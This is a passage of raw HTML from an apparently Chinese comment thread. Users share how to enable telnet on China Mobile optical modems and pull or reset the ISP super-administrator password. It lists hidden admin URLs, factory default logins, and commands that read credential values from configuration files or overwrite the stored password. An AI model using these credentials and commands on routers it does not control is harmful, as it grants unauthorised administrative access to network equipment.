#18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;武汉移动HG6142A1成功&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;安徽移动 型号HG6201M 成功&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;山西太原 HG6045F3&amp;nbsp;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;成功&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;四川移动hg6145d1，使用楼主的方法，第二步开启telent，页面显示无权限。 可以参考这个提供的超级密码，亲测可行。&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;找到运营商屏蔽了telnet指令的解决办法了，参考了恩山大佬的帖子（https://www.right.com.cn/forum/thread-8386512-1-1.html），进fhdata，cat usrconfig_conf扒出来的。
最后的结论是：telnet登陆后不要进入工厂模式，直接输入cfg_cmd get InternetGatewayDevice.DeviceInfo.X_CMCC_TeleComAccount.Username获取管理员账号；
输入cfg_cmd get InternetGatewayDevice.DeviceInfo.X_CMCC_TeleComAccount.Password获取管理员动态密码。&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;HG51e广东移动
1、开启光猫telnet:浏览器输入地址——&amp;gt;http://192.168.1.1/webcmcc/telnet.html

2、登录telnet：用光猫背后的账号密码，远程telnet

3、查看超级管理员密码：cat /config/work/lastgood.xml | grep aucTeleAccountPassword&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;浙江移动HG6045F3在在Password:后面输入Fh@Mac后六位之后出现$&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;辽宁移动 HG6145F3 成功&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;上海移动 HG5145F，顺利搞定&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;中兴F7005mv3（移动版）,这个型号买的时候要记住让商家固化telnet，应该到手的时候默认远程Telnet是开启的，因为第一步没有用（应该可以物理链接光猫）。随后打开控制台，输入telnet 192.168.1.1，输入账号和密码，默认是root 和 Zte521。随后直接输入sendcmd 1 DB set DevAuthInfo 0 Pass nE7jA%5m
这串代码是把超级密码设置为nE7jA%5m
，当然你也可以设置成别的，但是密码复杂度一定要够。至于超级账号名，移动默认是CMCCAdmin。至于其他运营商的超级账号名都能查到。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;bili-comment-renderer id=&quot;comment&quot; style=&quot;--bili-comment-spotlight-color: var(--brand_blue_thin); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;/bili-comment-renderer&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div id=&quot;body&quot; class=&quot; light &quot; style=&quot;position: relative; padding-left: 80px; padding-top: 22px; --bili-comment-hover-more-display: block;&quot;&gt;&lt;div id=&quot;main&quot; style=&quot;width: 516px;&quot;&gt;&lt;div id=&quot;content&quot; style=&quot;width: 516px; overflow: hidden; font-size: var(--bili-comments-font-size-content); line-height: var(--bili-comments-line-height-content); color: var(--text1);&quot;&gt;&lt;bili-rich-text style=&quot;--bili-rich-text-display: inline; --bili-rich-text-white-space: pre-line; --bili-rich-text-word-break: break-word; --bili-rich-text-icon-vertical-align: sub; --bili-rich-text-link-color: var(--Lb6); --bili-rich-text-link-color-hover: var(--brand_blue, #00AEEC); --icon-vertical-align: var(--bili-rich-text-icon-vertical-align); color: var(--bili-rich-text-color, var(--text1, #18191C)); font-size: var(--bili-rich-text-font-size, 15px); line-height: var(--bili-rich-text-line-height, 21px); font-family: var(--bili-font-family); --bili-rich-text-font-size: var(--bili-comments-font-size-content); --bili-rich-text-line-height: var(--bili-comments-line-height-content);&quot;&gt;&lt;p id=&quot;contents&quot; style=&quot;margin-block: 0px; display: var(--bili-rich-text-display); white-space: var(--bili-rich-text-white-space); word-break: var(--bili-rich-text-word-break); -webkit-font-smoothing: antialiased;&quot;&gt;HG267GT。使用文章方法开启telnet无效，无任何提示跳转到登陆页面；使用user登陆后则提示Invalid Session Key, please try again。访问http://192.168.1.1/logoffaccount.html可以打开免登录设置，启用隐藏用户（保存），然后使用fiberhomehg2x0，hg2x0登陆进入，可以看到开启telnet的选项（保存），并且可以设置端口账号密码。在cmd中，telnet可以使用前面保存的账号登陆，文章中的密码无效，登陆进去之后是 &amp;gt; 符号而非 #，无法执行这些命令，cat也找不到文件，所以admin应该不是正确的账号；而root也无法登陆，各种发现的密码均无效（包括文中的），最终卡在了这里&lt;/p&gt;&lt;/bili-rich-text&gt;&lt;/div&gt;&lt;div id=&quot;footer&quot;&gt;&lt;bili-comment-action-buttons-renderer style=&quot;width: 516px; display: flex; align-items: center; position: relative; margin-top: 3px; font-size: 13px; color: var(--text3); --bili-comment-action-buttons-more-display: var(--bili-comment-hover-more-display);&quot;&gt;&lt;div id=&quot;pubdate&quot;&gt;2024-01-23 02:24&lt;/div&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: inline-flex; align-items: center; cursor: pointer;&quot;&gt;&lt;bili-icon size=&quot;16&quot; icon=&quot;BDC/hand_thumbsup_line/1&quot; style=&quot;display: inline-flex; align-items: center; vertical-align: middle;&quot;&gt;&lt;svg id=&quot;icon&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; width=&quot;16&quot; height=&quot;16&quot; viewbox=&quot;0 0 16 16&quot;&gt;&lt;path d=&quot;M9.283433333333333 2.0303066666666663C9.095466666666667 2.0083933333333333 8.921333333333333 2.09014 8.828166666666666 2.1991199999999997C8.424633333333333 2.6711333333333336 8.332133333333333 3.3649466666666665 8.029333333333334 3.9012466666666663C7.630633333333333 4.607453333333333 7.258833333333333 5.034486666666666 6.800866666666666 5.436006666666666C6.42382 5.7665733333333336 6.042199999999999 5.987959999999999 5.666666666666666 6.09112L5.666666666666666 13.1497C6.19062 13.1611 6.751966666666666 13.168333333333333 7.333333333333333 13.168333333333333C8.831233333333333 13.168333333333333 10.1019 13.120766666666665 10.958166666666665 13.076699999999999C11.565133333333332 13.045433333333332 12.091966666666666 12.7451 12.366466666666668 12.256733333333333C12.7516 11.571599999999998 13.2264 10.5669 13.514166666666664 9.3835C13.7823 8.2808 13.904599999999999 7.374333333333333 13.959466666666666 6.734999999999999C13.984933333333332 6.438646666666667 13.750433333333334 6.166686666666667 13.386666666666665 6.166686666666667L10.065133333333332 6.166686666666667C9.898433333333333 6.166686666666667 9.742666666666667 6.08362 9.649833333333333 5.945166666666666C9.536066666666667 5.775493333333333 9.560033333333333 5.5828533333333334 9.6312 5.403346666666666C9.783966666666666 5.013846666666666 9.983933333333333 4.432846666666666 10.062766666666667 3.90454C10.1406 3.3830066666666667 10.121599999999999 2.9639466666666667 9.917133333333332 2.57626C9.697399999999998 2.1596933333333332 9.448266666666665 2.0495266666666665 9.283433333333333 2.0303066666666663zM10.773433333333333 5.166686666666666L13.386666666666665 5.166686666666666C14.269133333333333 5.166686666666666 15.036999999999999 5.875273333333333 14.9558 6.8206C14.897 7.505533333333333 14.767199999999999 8.462733333333333 14.485833333333334 9.6198C14.170333333333334 10.917200000000001 13.6532 12.008466666666665 13.238166666666666 12.746766666666666C12.7729 13.574433333333333 11.910266666666667 14.029 11.009566666666666 14.075366666666667C10.14 14.120166666666666 8.851766666666666 14.168333333333333 7.333333333333333 14.168333333333333C5.862206666666666 14.168333333333333 4.51776 14.1231 3.565173333333333 14.079633333333334C2.4932333333333334 14.030733333333332 1.5939999999999999 13.234466666666666 1.4786599999999999 12.143466666666665C1.4028 11.426066666666665 1.3333333333333333 10.4978 1.3333333333333333 9.501666666666665C1.3333333333333333 8.588966666666666 1.3916466666666667 7.761233333333333 1.4598999999999998 7.104466666666667C1.5791666666666666 5.95696 2.5641 5.166686666666666 3.671693333333333 5.166686666666666L5.166666666666666 5.166686666666666C5.3793066666666665 5.166686666666666 5.709213333333333 5.063186666666667 6.141613333333333 4.68408C6.516733333333333 4.355193333333333 6.816366666666667 4.015666666666666 7.158533333333333 3.409613333333333C7.5023 2.8007333333333335 7.6041 2.0920066666666663 8.068066666666667 1.54932C8.372133333333332 1.1936466666666665 8.8718 0.9755333333333334 9.399233333333333 1.03704C9.949866666666665 1.10124 10.457733333333334 1.4577866666666666 10.801633333333331 2.109713333333333C11.148866666666665 2.767993333333333 11.143799999999999 3.4356599999999995 11.051833333333335 4.0520933333333335C10.993899999999998 4.44022 10.875366666666666 4.852359999999999 10.773433333333333 5.166686666666666zM4.666666666666666 13.122166666666667L4.666666666666666 6.166686666666667L3.671693333333333 6.166686666666667C3.029613333333333 6.166686666666667 2.5161533333333335 6.615046666666666 2.4545466666666664 7.207833333333333C2.3890599999999997 7.837933333333333 2.333333333333333 8.630433333333333 2.333333333333333 9.501666666666665C2.333333333333333 10.453433333333333 2.399833333333333 11.345266666666667 2.473113333333333 12.038333333333334C2.533993333333333 12.614133333333331 3.0083466666666667 13.053199999999999 3.6107466666666665 13.0807C3.9228066666666668 13.094899999999999 4.278173333333333 13.109333333333334 4.666666666666666 13.122166666666667z&quot; fill=&quot;currentColor&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/bili-icon&gt;&lt;span id=&quot;count&quot; style=&quot;margin-left: 5px; display: inline-block;&quot;&gt;&lt;/span&gt;&lt;/button&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: inline-flex; align-items: center; cursor: pointer;&quot;&gt;&lt;bili-icon size=&quot;16&quot; icon=&quot;BDC/hand_thumbsdown_line/1&quot; style=&quot;display: inline-flex; align-items: center; vertical-align: middle;&quot;&gt;&lt;svg id=&quot;icon&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; width=&quot;16&quot; height=&quot;16&quot; viewbox=&quot;0 0 16 16&quot;&gt;&lt;path d=&quot;M9.283433333333333 13.9697C9.095466666666667 13.9916 8.921333333333333 13.909866666666666 8.828166666666666 13.8009C8.424633333333333 13.328866666666666 8.332133333333333 12.635066666666667 8.029333333333334 12.098766666666666C7.630633333333333 11.392566666666667 7.258833333333333 10.9655 6.800866666666666 10.564C6.42382 10.233433333333332 6.042199999999999 10.012033333333333 5.666666666666666 9.908866666666666L5.666666666666666 2.8503266666666662C6.19062 2.83892 6.751966666666666 2.8316799999999995 7.333333333333333 2.8316799999999995C8.831233333333333 2.8316799999999995 10.1019 2.87922 10.958166666666665 2.923313333333333C11.565133333333332 2.9545733333333333 12.091966666666666 3.254906666666667 12.366466666666668 3.74326C12.7516 4.428373333333333 13.2264 5.4331 13.514166666666664 6.616486666666667C13.7823 7.719199999999999 13.904599999999999 8.625666666666666 13.959466666666666 9.265C13.984933333333332 9.561366666666666 13.750433333333334 9.833333333333332 13.386666666666665 9.833333333333332L10.065133333333332 9.833333333333332C9.898433333333333 9.833333333333332 9.742666666666667 9.9164 9.649833333333333 10.054833333333333C9.536066666666667 10.224499999999999 9.560033333333333 10.417133333333332 9.6312 10.596633333333333C9.783966666666666 10.986166666666666 9.983933333333333 11.567166666666667 10.062766666666667 12.095466666666667C10.1406 12.616966666666666 10.121599999999999 13.036066666666665 9.917133333333332 13.423766666666666C9.697399999999998 13.8403 9.448266666666665 13.950466666666665 9.283433333333333 13.9697zM10.773433333333333 10.833333333333332L13.386666666666665 10.833333333333332C14.269133333333333 10.833333333333332 15.036999999999999 10.124733333333332 14.9558 9.1794C14.897 8.494466666666666 14.767199999999999 7.537266666666666 14.485833333333334 6.380213333333334C14.170333333333334 5.08278 13.6532 3.991546666666667 13.238166666666666 3.25324C12.7729 2.425586666666667 11.910266666666667 1.9710199999999998 11.009566666666666 1.9246400000000001C10.14 1.8798599999999999 8.851766666666666 1.8316866666666665 7.333333333333333 1.8316866666666665C5.862206666666666 1.8316866666666665 4.51776 1.8769066666666667 3.565173333333333 1.9203599999999998C2.4932333333333334 1.969253333333333 1.5939999999999999 2.765553333333333 1.4786599999999999 3.856533333333333C1.4028 4.573953333333333 1.3333333333333333 5.502233333333333 1.3333333333333333 6.498353333333332C1.3333333333333333 7.411033333333333 1.3916466666666667 8.238766666666667 1.4598999999999998 8.895533333333333C1.5791666666666666 10.043033333333334 2.5641 10.833333333333332 3.671693333333333 10.833333333333332L5.166666666666666 10.833333333333332C5.3793066666666665 10.833333333333332 5.709213333333333 10.936833333333333 6.141613333333333 11.3159C6.516733333333333 11.644799999999998 6.816366666666667 11.984333333333334 7.158533333333333 12.590399999999999C7.5023 13.199266666666666 7.6041 13.907999999999998 8.068066666666667 14.4507C8.372133333333332 14.806333333333331 8.8718 15.024466666666665 9.399233333333333 14.962966666666667C9.949866666666665 14.898766666666667 10.457733333333334 14.542233333333332 10.801633333333331 13.8903C11.148866666666665 13.232 11.143799999999999 12.564333333333332 11.051833333333335 11.947933333333333C10.993899999999998 11.5598 10.875366666666666 11.147633333333333 10.773433333333333 10.833333333333332zM4.666666666666666 2.8778466666666667L4.666666666666666 9.833333333333332L3.671693333333333 9.833333333333332C3.029613333333333 9.833333333333332 2.5161533333333335 9.384966666666667 2.4545466666666664 8.792166666666667C2.3890599999999997 8.162066666666666 2.333333333333333 7.369566666666666 2.333333333333333 6.498353333333332C2.333333333333333 5.546566666666667 2.399833333333333 4.654719999999999 2.473113333333333 3.96168C2.533993333333333 3.385866666666667 3.0083466666666667 2.946793333333333 3.6107466666666665 2.91932C3.9228066666666668 2.9050866666666666 4.278173333333333 2.8906666666666667 4.666666666666666 2.8778466666666667z&quot; fill=&quot;currentColor&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/bili-icon&gt;&lt;/button&gt;&lt;div id=&quot;reply&quot; style=&quot;margin-left: 20px;&quot;&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: inline-flex; align-items: center; cursor: pointer;&quot;&gt;回复&lt;/button&gt;&lt;/div&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: var(--bili-comment-action-buttons-more-display, none); align-items: center; cursor: pointer; width: 24px;&quot;&gt;&lt;bili-icon size=&quot;16&quot; icon=&quot;BDC/more_vertical_fill/1&quot; style=&quot;display: inline-flex; align-items: center; vertical-align: middle;&quot;&gt;&lt;svg id=&quot;icon&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; width=&quot;16&quot; height=&quot;16&quot; viewbox=&quot;0 0 16 16&quot;&gt;&lt;path d=&quot;M9.082233333333333 3.665566666666667C9.082233333333333 4.2632666666666665 8.597733333333332 4.7478066666666665 8 4.7478066666666665C7.4023 4.7478066666666665 6.917766666666666 4.2632666666666665 6.917766666666666 3.665566666666667C6.917766666666666 3.0678666666666663 7.4023 2.583333333333333 8 2.583333333333333C8.597733333333332 2.583333333333333 9.082233333333333 3.0678666666666663 9.082233333333333 3.665566666666667zM9.0823 12.332333333333333C9.0823 12.930066666666665 8.597733333333332 13.414633333333331 8 13.414633333333331C7.402233333333333 13.414633333333331 6.917666666666666 12.930066666666665 6.917666666666666 12.332333333333333C6.917666666666666 11.734566666666666 7.402233333333333 11.25 8 11.25C8.597733333333332 11.25 9.0823 11.734566666666666 9.0823 12.332333333333333zM8 9.083233333333332C8.598299999999998 9.083233333333332 9.0833 8.598233333333333 9.0833 7.9999666666666664C9.0833 7.4016666666666655 8.598299999999998 6.916666666666666 8 6.916666666666666C7.4017 6.916666666666666 6.9167 7.4016666666666655 6.9167 7.9999666666666664C6.9167 8.598233333333333 7.4017 9.083233333333332 8 9.083233333333332z&quot; fill=&quot;currentColor&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/bili-icon&gt;&lt;/button&gt;&lt;bili-comment-menu style=&quot;--bili-comment-menu-display: none; --bili-comment-menu-position: absolute; --bili-comment-menu-top: 20px; --bili-comment-menu-right: 0;&quot;&gt;&lt;/bili-comment-menu&gt;&lt;/bili-comment-action-buttons-renderer&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;div id=&quot;replies&quot; style=&quot;font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;bili-comment-replies-renderer&gt;&lt;div id=&quot;expander&quot; style=&quot;padding-left: 80px; margin-top: 2px;&quot;&gt;&lt;div id=&quot;expander-contents&quot; style=&quot;position: relative;&quot;&gt;&lt;bili-comment-reply-renderer style=&quot;--bili-comment-spotlight-color: 